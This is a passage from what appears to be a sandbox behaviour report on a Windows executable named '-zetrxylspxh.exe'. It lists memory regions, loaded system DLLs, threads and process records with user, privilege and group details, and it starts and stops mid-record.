entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4181 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4182 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4183 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4184 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4185 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4186 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4187 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4188 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4568 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4569 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4570 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4571 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4572 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4573 start_va = 0x4d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 4574 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4575 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4576 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4577 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4578 start_va = 0x4d0000 end_va = 0x58dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4579 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4580 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4581 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5011 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5012 start_va = 0x6d0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 5013 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5014 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5015 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5016 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5017 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5018 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5035 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5036 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5037 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5038 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5039 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5040 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5041 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5042 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5043 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5044 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5045 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5046 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5489 start_va = 0x480000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 5490 start_va = 0x7d0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 5491 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5492 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5493 start_va = 0x8d0000 end_va = 0xa57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 5494 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 125 os_tid = 0xb4c Thread: id = 162 os_tid = 0xe08 Thread: id = 172 os_tid = 0x11a4 Process: id = "36" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd3f9000" os_pid = "0x87c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4196 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4197 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4198 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4199 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4200 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4201 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4202 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4203 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4204 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4205 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4206 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4207 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4208 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4209 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4210 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4211 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4582 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 4583 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4584 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4585 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4586 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4587 start_va = 0x4a0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4588 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4589 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4590 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4591 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4592 start_va = 0x4a0000 end_va = 0x55dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4593 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 4594 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5063 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5064 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 5065 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 5066 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5067 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5068 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5069 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5070 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5071 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5072 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5073 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5074 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5075 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5076 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5077 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5094 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5095 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5096 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5097 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5098 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5099 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5495 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 5496 start_va = 0x7f0000 end_va = 0x8effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 5497 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5498 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5499 start_va = 0x8f0000 end_va = 0xa77fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 5500 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 126 os_tid = 0x680 Thread: id = 163 os_tid = 0x13a0 Thread: id = 175 os_tid = 0x1180 Process: id = "37" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0x106fe000" os_pid = "0x8fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4216 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4217 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4218 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4219 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4220 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4221 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4222 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4223 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4224 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4225 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4226 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4227 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4228 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4229 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4230 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4231 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4619 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 4620 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4621 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4622 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4623 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4624 start_va = 0x500000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4625 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4626 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = 